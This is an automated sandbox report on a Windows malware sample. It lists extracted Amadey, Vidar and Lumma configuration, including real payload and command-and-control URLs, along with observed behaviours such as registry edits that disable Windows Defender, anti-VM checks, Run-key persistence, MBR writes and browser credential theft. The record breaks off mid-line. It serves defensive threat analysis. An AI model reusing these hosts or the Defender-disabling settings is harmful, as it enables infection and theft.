Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
18-02-2025 06:32
Static task
static1
Behavioral task
behavioral1
Sample
2341120afd619b888c8316c0a91d39b8.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
2341120afd619b888c8316c0a91d39b8.exe
Resource
win10v2004-20250217-en
General
-
Target
2341120afd619b888c8316c0a91d39b8.exe
-
Size
2.0MB
-
MD5
2341120afd619b888c8316c0a91d39b8
-
SHA1
a20ac1ddd4110ea8a3e7732c8b49ab84df004ce7
-
SHA256
c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b
-
SHA512
89cefe006dbd385374fb4feee4b32b944bacee34ae160404ab3516ab12bded8c976699d76290fbc9dd911ba9bfa0c906b944a68d06baad25fc1529cc3a204d0b
-
SSDEEP
49152:LAHg7O11+U6WgTQv6Rw/HUtUXYeimDSD4ro:sHYO14UuQv6KHzj7E
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
vidar
https://t.me/g02f04
https://steamcommunity.com/profiles/76561199828130190
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Extracted
lumma
https://mercharena.biz/api
Signatures
-
Amadey family
-
Detect Vidar Stealer 16 IoCs
resource yara_rule behavioral2/memory/2924-209-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/2924-211-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/2924-233-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/2924-245-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/2924-256-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/2924-273-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/2924-404-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/2924-416-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/2924-419-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/2924-439-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/2924-497-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/2924-506-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/2924-510-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/2924-608-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/2924-613-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/2924-675-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/4936-174-0x0000000000FA0000-0x00000000013FA000-memory.dmp healer behavioral2/memory/4936-175-0x0000000000FA0000-0x00000000013FA000-memory.dmp healer behavioral2/memory/4936-369-0x0000000000FA0000-0x00000000013FA000-memory.dmp healer -
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
Vidar family
-
Enumerates VirtualBox registry keys 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF 32ce1ef777.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF ca646f5e84.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 21 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 529341dc7d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ca646f5e84.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2341120afd619b888c8316c0a91d39b8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 34577fd695.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 64b92fda63.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b2744386dc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6a88d36c36.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 328d864569.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a196a268d4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 24ca60c2c6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ed42936eb2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 32ce1ef777.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 89b3a0ee52.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8114b9774a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp3AGS0W6CGFGZW4RYQLG0KNHWV7DPLKAU.EXE -
Blocklisted process makes network request 64 IoCs
flow pid Process 32 4216 powershell.exe 48 4576 powershell.exe 85 2896 powershell.exe 88 2896 powershell.exe 106 2896 powershell.exe 109 2896 powershell.exe 124 2896 powershell.exe 135 2896 powershell.exe 136 2896 powershell.exe 138 2896 powershell.exe 143 2896 powershell.exe 146 2896 powershell.exe 151 2896 powershell.exe 157 2896 powershell.exe 159 2896 powershell.exe 160 2896 powershell.exe 161 2896 powershell.exe 162 2896 powershell.exe 163 2896 powershell.exe 164 2896 powershell.exe 165 2896 powershell.exe 166 2896 powershell.exe 167 2896 powershell.exe 168 2896 powershell.exe 169 2896 powershell.exe 170 2896 powershell.exe 171 2896 powershell.exe 172 2896 powershell.exe 173 2896 powershell.exe 174 2896 powershell.exe 183 2896 powershell.exe 185 2896 powershell.exe 190 2896 powershell.exe 194 2896 powershell.exe 195 2896 powershell.exe 200 2896 powershell.exe 206 2896 powershell.exe 210 2896 powershell.exe 212 2896 powershell.exe 213 2896 powershell.exe 218 2896 powershell.exe 224 2896 powershell.exe 229 2896 powershell.exe 231 2896 powershell.exe 235 2896 powershell.exe 237 2896 powershell.exe 240 2896 powershell.exe 243 2896 powershell.exe 245 2896 powershell.exe 247 2896 powershell.exe 249 2896 powershell.exe 252 2896 powershell.exe 253 2896 powershell.exe 254 2896 powershell.exe 255 2896 powershell.exe 256 2896 powershell.exe 257 2896 powershell.exe 259 2896 powershell.exe 261 2896 powershell.exe 262 2896 powershell.exe 291 2896 powershell.exe 315 2896 powershell.exe 343 2896 powershell.exe 352 4724 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 4576 powershell.exe 1356 powershell.exe 4724 powershell.exe 4216 powershell.exe 2712 powershell.exe 3544 powershell.exe 4464 powershell.exe 4876 powershell.exe -
Downloads MZ/PE file 30 IoCs
flow pid Process 30 3440 futors.exe 30 3440 futors.exe 30 3440 futors.exe 211 3440 futors.exe 363 5776 BitLockerToGo.exe 15 532 skotes.exe 15 532 skotes.exe 15 532 skotes.exe 15 532 skotes.exe 15 532 skotes.exe 358 1624 BitLockerToGo.exe 445 7048 BitLockerToGo.exe 32 4216 powershell.exe 48 4576 powershell.exe 142 3440 futors.exe 352 4724 powershell.exe 42 532 skotes.exe 42 532 skotes.exe 42 532 skotes.exe 42 532 skotes.exe 42 532 skotes.exe 42 532 skotes.exe 42 532 skotes.exe 42 532 skotes.exe 42 532 skotes.exe 42 532 skotes.exe 42 532 skotes.exe 42 532 skotes.exe 42 532 skotes.exe 42 532 skotes.exe -
Uses browser remote debugging 2 TTPs 13 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 588 chrome.exe 3080 chrome.exe 4436 chrome.exe 4832 msedge.exe 4936 msedge.exe 4668 chrome.exe 4224 chrome.exe 868 msedge.exe 1608 msedge.exe 508 msedge.exe 5676 chrome.exe 5004 chrome.exe 4656 chrome.exe -
Checks BIOS information in registry 2 TTPs 42 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8114b9774a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8114b9774a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ed42936eb2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 89b3a0ee52.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 24ca60c2c6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ed42936eb2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 34577fd695.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6a88d36c36.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 529341dc7d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp3AGS0W6CGFGZW4RYQLG0KNHWV7DPLKAU.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 328d864569.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a196a268d4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 89b3a0ee52.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 32ce1ef777.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 64b92fda63.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 24ca60c2c6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b2744386dc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b2744386dc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2341120afd619b888c8316c0a91d39b8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 34577fd695.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 529341dc7d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ca646f5e84.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 328d864569.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 64b92fda63.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ca646f5e84.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a196a268d4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 32ce1ef777.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6a88d36c36.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp3AGS0W6CGFGZW4RYQLG0KNHWV7DPLKAU.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2341120afd619b888c8316c0a91d39b8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation 7aencsM.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation 32ce1ef777.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation 2341120afd619b888c8316c0a91d39b8.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation mshta.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe -
Executes dropped EXE 48 IoCs
pid Process 532 skotes.exe 4604 amnew.exe 3440 futors.exe 1192 239247cd96.exe 4936 TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE 3740 7aencsM.exe 2924 7aencsM.exe 1788 483d2fa8a0d53818306efeb32d3.exe 4632 Ta3ZyUR.exe 2664 Ta3ZyUR.exe 4312 DTQCxXZ.exe 2664 d2YQIJa.exe 3372 trano1221.exe 2624 trano1221.exe 5032 Bjkm5hE.exe 2224 Bjkm5hE.exe 4896 Bjkm5hE.exe 3864 con12312211221.exe 2588 con12312211221.exe 220 monthdragon.exe 2476 monthdragon.exe 1832 skotes.exe 1676 futors.exe 3900 12321321.exe 3732 alex12112.exe 1256 alex12112.exe 4524 qFqSpAp.exe 1552 jROrnzx.exe 3208 jROrnzx.exe 2580 32ce1ef777.exe 3104 34577fd695.exe 4212 6a88d36c36.exe 1644 529341dc7d.exe 3556 328d864569.exe 2100 65bd8e080d.exe 1976 a8a078ad49.exe 5944 Temp3AGS0W6CGFGZW4RYQLG0KNHWV7DPLKAU.EXE 5492 a196a268d4.exe 6428 24ca60c2c6.exe 5892 skotes.exe 1556 futors.exe 6176 64b92fda63.exe 5204 ed42936eb2.exe 2084 89b3a0ee52.exe 5200 service123.exe 3592 ca646f5e84.exe 7104 8114b9774a.exe 7072 b2744386dc.exe -
Identifies Wine through registry keys 2 TTPs 21 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 529341dc7d.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine ed42936eb2.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine ca646f5e84.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 8114b9774a.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine b2744386dc.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 32ce1ef777.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 34577fd695.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 24ca60c2c6.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 64b92fda63.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 89b3a0ee52.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine d2YQIJa.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 6a88d36c36.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine Temp3AGS0W6CGFGZW4RYQLG0KNHWV7DPLKAU.EXE Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine a196a268d4.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 328d864569.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 2341120afd619b888c8316c0a91d39b8.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe -
Loads dropped DLL 32 IoCs
pid Process 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 2624 trano1221.exe 5200 service123.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\32ce1ef777.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10006950101\\32ce1ef777.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\34577fd695.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085392001\\34577fd695.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6a88d36c36.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085393001\\6a88d36c36.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\529341dc7d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10006960101\\529341dc7d.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\65bd8e080d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085395001\\65bd8e080d.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a8a078ad49.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085396001\\a8a078ad49.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\239247cd96.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085378101\\239247cd96.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085379021\\am_no.cmd" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 b2744386dc.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000a000000023cea-55.dat autoit_exe behavioral2/files/0x0008000000023e03-1029.dat autoit_exe behavioral2/files/0x0008000000023e06-1053.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs
pid Process 1784 2341120afd619b888c8316c0a91d39b8.exe 532 skotes.exe 4936 TempXDXEMXPCUR0CPFE2V7EODJDZ6IG48GCD.EXE 1788 483d2fa8a0d53818306efeb32d3.exe 2664 d2YQIJa.exe 1832 skotes.exe 2580 32ce1ef777.exe 3104 34577fd695.exe 4212 6a88d36c36.exe 1644 529341dc7d.exe 3556 328d864569.exe 5944 Temp3AGS0W6CGFGZW4RYQLG0KNHWV7DPLKAU.EXE 5492 a196a268d4.exe 6428 24ca60c2c6.exe 5892 skotes.exe 6176 64b92fda63.exe 5204 ed42936eb2.exe 2084 89b3a0ee52.exe 3592 ca646f5e84.exe 7104 8114b9774a.exe 7072 b2744386dc.exe -
Suspicious use of SetThreadContext 10 IoCs
description pid Process procid_target PID 3740 set thread context of 2924 3740 7aencsM.exe 111 PID 4632 set thread context of 2664 4632 Ta3ZyUR.exe 148 PID 5032 set thread context of 4896 5032 Bjkm5hE.exe 154 PID 3864 set thread context of 2588 3864 con12312211221.exe 165 PID 220 set thread context of 2476 220 monthdragon.exe 172 PID 3732 set thread context of 1256 3732 alex12112.exe 181 PID 1552 set thread context of 3208 1552 jROrnzx.exe 187 PID 1644 set thread context of 1624 1644 529341dc7d.exe 217 PID 3556 set thread context of 5776 3556 328d864569.exe 227 PID 5492 set thread context of 7048 5492 a196a268d4.exe 244 -
resource yara_rule behavioral2/files/0x0007000000023e48-563.dat upx behavioral2/memory/2624-567-0x00007FFB27220000-0x00007FFB27809000-memory.dmp upx behavioral2/memory/2624-581-0x00007FFB3B3B0000-0x00007FFB3B3C9000-memory.dmp upx behavioral2/memory/2624-584-0x00007FFB37550000-0x00007FFB3757D000-memory.dmp upx behavioral2/memory/2624-586-0x00007FFB37720000-0x00007FFB3772D000-memory.dmp upx behavioral2/memory/2624-587-0x00007FFB373F0000-0x00007FFB37423000-memory.dmp upx behavioral2/memory/2624-589-0x00007FFB281D0000-0x00007FFB2829D000-memory.dmp upx behavioral2/memory/2624-592-0x00007FFB37580000-0x00007FFB375A3000-memory.dmp upx behavioral2/memory/2624-591-0x00007FFB26D00000-0x00007FFB27220000-memory.dmp upx behavioral2/memory/2624-598-0x00007FFB37170000-0x00007FFB37196000-memory.dmp upx behavioral2/memory/2624-600-0x00007FFB37120000-0x00007FFB37163000-memory.dmp upx behavioral2/memory/2624-602-0x00007FFB370A0000-0x00007FFB370B2000-memory.dmp upx behavioral2/memory/2624-601-0x00007FFB373F0000-0x00007FFB37423000-memory.dmp upx behavioral2/memory/2624-603-0x00007FFB281D0000-0x00007FFB2829D000-memory.dmp upx behavioral2/memory/2624-636-0x00007FFB36740000-0x00007FFB3676B000-memory.dmp upx behavioral2/memory/2624-653-0x00007FFB37170000-0x00007FFB37196000-memory.dmp upx behavioral2/memory/2624-668-0x00007FFB37550000-0x00007FFB3757D000-memory.dmp upx behavioral2/memory/2624-667-0x00007FFB39200000-0x00007FFB39219000-memory.dmp upx behavioral2/memory/2624-666-0x00007FFB3B450000-0x00007FFB3B45D000-memory.dmp upx behavioral2/memory/2624-665-0x00007FFB3B3B0000-0x00007FFB3B3C9000-memory.dmp upx behavioral2/memory/2624-664-0x00007FFB3B460000-0x00007FFB3B46F000-memory.dmp 